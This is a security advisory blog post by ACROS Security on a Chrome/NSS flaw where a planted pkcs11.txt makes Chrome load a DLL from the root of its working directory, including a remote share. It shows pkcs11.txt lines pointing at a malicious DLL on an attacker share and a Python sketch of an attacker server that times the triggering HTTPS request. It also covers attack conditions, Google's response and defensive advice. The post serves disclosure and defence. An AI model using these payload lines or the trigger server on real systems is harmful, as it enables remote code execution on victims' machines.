Bug allows remote code execution in Chrome
In September, ACROS Security notified Google about a peculiar behavior of the Chrome browser that can, under specific conditions, be exploited for remote code execution outside the Chrome sandbox. It is another case of file planting, where an application loads a data file (as opposed to a binary file, which leads to binary planting) from the current working directory. Similar to our previously reported file planting in the Java Runtime Environment (still present in the current build 1.6.0_29 if you want to play with it), Chrome loads a data file, namely pkcs11.txt, from the root of the current working directory and, if the file exists, parses and processes its content. Security-wise, the most interesting value in a pkcs11.txt file is called library. Consider the following line in pkcs11.txt:
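In NSS's pkcs11.txt key=value syntax, such a line would look roughly like this (the name value here is an illustrative placeholder; library is the part that matters for the attack):

```
library=c:\temp\malicious.dll name=test
```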
This line instructs Chrome to load the library c:\temp\malicious.dll. Crucially for remote code execution attacks, it also works with remote shared folders; in our demonstration, the following line is used:
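The demonstration line has the same shape but with a UNC path; the server and share names below are placeholders, not those from the actual demonstration:

```
library=\\attacker-server\share\malicious.dll name=test
```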
In addition, the library file doesn't need to have a known extension (such as ".dll"), which makes it harder to block on a firewall.
Finally, the Chrome sandbox provides no protection here, as the entire process of loading pkcs11.txt and the associated library is done by the parent chrome.exe process.
HTTPS, NSS And pkcs11.txt
Chrome loads "/pkcs11.txt" the first time it needs to do anything encryption-related, which in most cases means visiting an HTTPS URL. Chrome developers tracked this issue to one of Mozilla's Network Security Services (NSS) libraries, and it seems a matter of unfortunate circumstances gave life to this bug in Chrome; the same bug may also exist in other products integrating NSS libraries.
If you read the previous paragraph carefully, you may have noticed two things:
1. Chrome loads pkcs11.txt the first time it needs PKCS #11 capabilities, and it never does so again until re-launched. This means that if the user has already visited an HTTPS address before, or any of the sites he visited has loaded an image or other data via HTTPS, the attack opportunity is gone. What makes things worse for the attacker is the fact that when Google is the selected search engine (which it is by default), Chrome sends an HTTPS request to Google immediately upon startup to determine your local Google domain. This triggers the loading of pkcs11.txt from the root of the user's local system drive and closes the attacker's window of opportunity before it was ever really opened.
2. The initial forward slash in the file name "/pkcs11.txt" means that pkcs11.txt will be loaded from the root of the current working directory, not from the current working directory itself. For instance, if the current working directory is C:\users\james\, Chrome will try to load C:\pkcs11.txt. In the shared folder case, if the current working directory is \\server\share\somefolder\, Chrome will try to load \\server\share\pkcs11.txt.
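The resolution rule above can be sketched as a small Python helper. This is an illustration of the path logic only, not Chrome's or NSS's actual code:

```python
# Illustration of the "/pkcs11.txt" resolution rule: a leading slash is
# taken relative to the ROOT of the current working directory's drive or
# network share, not relative to the CWD itself.
def pkcs11_path(cwd: str) -> str:
    if cwd.startswith("\\\\"):
        # UNC path: keep only \\server\share
        server, share = cwd.lstrip("\\").split("\\")[:2]
        return "\\\\" + server + "\\" + share + "\\pkcs11.txt"
    # Local path: keep only the drive letter, e.g. "C:"
    return cwd[:2] + "\\pkcs11.txt"

print(pkcs11_path("C:\\users\\james\\"))               # C:\pkcs11.txt
print(pkcs11_path("\\\\server\\share\\somefolder\\"))  # \\server\share\pkcs11.txt
```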
So how can this vulnerability be exploited? Three conditions need to be met:
Google must not be the selected search engine. This setting is configurable on the Options page, where users can set Yahoo, Bing, or any other search provider as their selected search engine. We confirmed that Yahoo and Bing don't send any HTTPS requests when Chrome is launched and are therefore suitable for mounting the attack.
The user must not have visited any HTTPS resources before the attack. As described above, the attack relies on the NSS capabilities not yet having been initialized in the running parent Chrome process. Ideally for the attacker, the user would have just launched Chrome and not visited any web sites that send HTTPS requests.
Chrome's current working directory must be set to an attacker-controlled location. Since Chrome sets its current working directory to its own folder on the user's machine upon startup, double-clicking an HTML file in a remote shared folder (which often works for binary planting attacks) wouldn't achieve anything for the attacker. The best remaining way we know of to set the current working directory in Chrome is then a file browse dialog. If the attacker could get the user to try to load a file from her network shared folder, and trigger the first HTTPS request while the user had this folder open in the "Open" dialog, Chrome would load pkcs11.txt from the root of the attacker's network share and load the library specified in it.
We have prepared an on-line demonstration here. Simply open this page with Chrome and follow the instructions. If you don't have Chrome handy and want to see what would happen if you did, here's a video of the demonstration:
Attack improvements and variations
Our demonstration requires you to wait until the countdown reaches 0 before the attack completes and the remote DLL is loaded. This wait ensures that the "Open" dialog has successfully loaded the remote shared folder, which can take anywhere from 5 to 30 seconds according to our tests. A real attack would not keep you waiting: the attacker-controlled server could detect the incoming requests (SMB or WebDAV) indicating that Chrome's current working directory has been set to its network share, and then instruct the web page already loaded in Chrome to make an HTTPS request, which would result in Chrome loading pkcs11.txt from the attacker's network share just as in our demonstration.
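The attacker-side trigger described above could be sketched like this. It is a minimal illustration with hypothetical paths and endpoints, not the actual demonstration code, and the real share would be served over SMB or full WebDAV rather than this deliberately stripped-down handler:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
import threading

# Set once a request pattern indicates the victim's "Open" dialog has
# browsed our share, i.e. Chrome's CWD now points into it.
share_browsed = threading.Event()

def is_share_browse(method: str, path: str) -> bool:
    """Heuristic: a WebDAV PROPFIND against the shared folder means a
    file browse dialog is listing it. Paths are hypothetical."""
    return method == "PROPFIND" and path.startswith("/share/")

class AttackerHandler(BaseHTTPRequestHandler):
    def do_PROPFIND(self):
        if is_share_browse("PROPFIND", self.path):
            share_browsed.set()          # window of opportunity is open
        self.send_response(207)          # WebDAV Multi-Status
        self.end_headers()

    def do_GET(self):
        if self.path == "/poll":
            # The exploit page long-polls this endpoint; once the share
            # has been browsed, the page's JavaScript issues the victim's
            # first HTTPS request, making NSS load /pkcs11.txt from the
            # share root.
            share_browsed.wait(timeout=30)
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"go" if share_browsed.is_set() else b"wait")
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, fmt, *args):   # keep the sketch quiet
        pass
```

Such a server would be started with `HTTPServer(("", 80), AttackerHandler).serve_forever()`; the timing logic is the point here, and the WebDAV handling is intentionally minimal.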
The current working directory can also be set via the "Save As…" dialog or any other file browse dialog the attacker feels her victim would most likely be duped into opening.
A bizarre local variant of the same exploit is also possible in the extremely unlikely case that the user has his Downloads folder in the root of one of his local drives. In that case, all the attacker would have to do is get a malicious pkcs11.txt downloaded via the user's Chrome (which can happen in a drive-by fashion, as .txt is not a "dangerous" extension) and wait for the user to open the "Save As…" dialog, which by default opens at the Downloads folder's location.
Is this a vulnerability or not?
Google decided that this was not a vulnerability, but rather a “strange behavior that [they] should consider changing”. The reason they provided was that “the social engineering level involved here is significantly higher than ‘Your computer is infected with a virus, download this free anti-virus software and run the exe file to fix it.'”
This is actually hard to dispute. From an attacker's perspective, given these two attack options, she would probably be more successful with the "fake anti-virus" one than with the "file planting" one. However, the "fake anti-virus" option may not work against corporate users, whose firewalls are likely to prevent them from downloading an executable and who may not be technically allowed (e.g., with AppLocker) to launch unauthorized executables. Additionally, employees who have attended at least one security awareness session may be more suspicious of a "please download and execute this" request than of an "open a file from this folder" one. Then again, they may not be; who knows.
Regardless, as security researchers we consider any "feature" that allows silent downloading of remote code and its execution on a user's computer without warnings to be a vulnerability. Clearly the same criteria cannot apply to Joe Average and to someone working at a nuclear power plant, and it's not a big deal if Google doesn't share our vulnerability criteria (security experts disagree on many things all the time), but Google's reasoning opens up an interesting and important question: how much social engineering is too much?
Microsoft's Security Intelligence Report Volume 11 reveals (based on Microsoft's data) that 88% of attacks in the first half of 2011 depended on what they call "user interaction" and "feature abuse", both of which are part of what is generally considered "social engineering," i.e., getting users to do something they otherwise wouldn't. While this doesn't answer the above question, it sheds some light on how prevalent, and how successful, social engineering seems to be in real attacks. It seems plausible that as technical security countermeasures block more and more attack paths, attackers will look for the remaining paths of least resistance, both technical and social.
What can we learn?
1. Loading data files from untrusted locations can be dangerous, and this includes the current working directory. Action item: fire up Process Monitor while testing your applications and see what they're loading.
2. Third-party libraries can introduce vulnerabilities into your software, and possibly only into your software. Action item: use third-party libraries whose developers are quick to fix bugs, or at least ones you can patch yourself. (The NSS library with this particular bug fortunately has both of these properties.)
3. What is a vulnerability to some can be just strange behavior to others, and there are no industry criteria for telling who's right. (Although we can probably agree that the actual attacker is always right.) Action item for the issue described in this post: make sure your Chrome home page is an HTTPS address or loads at least one HTTPS resource, and you won't have to care who's right.
Author: Mitja Kolsek, CEO of ACROS Security.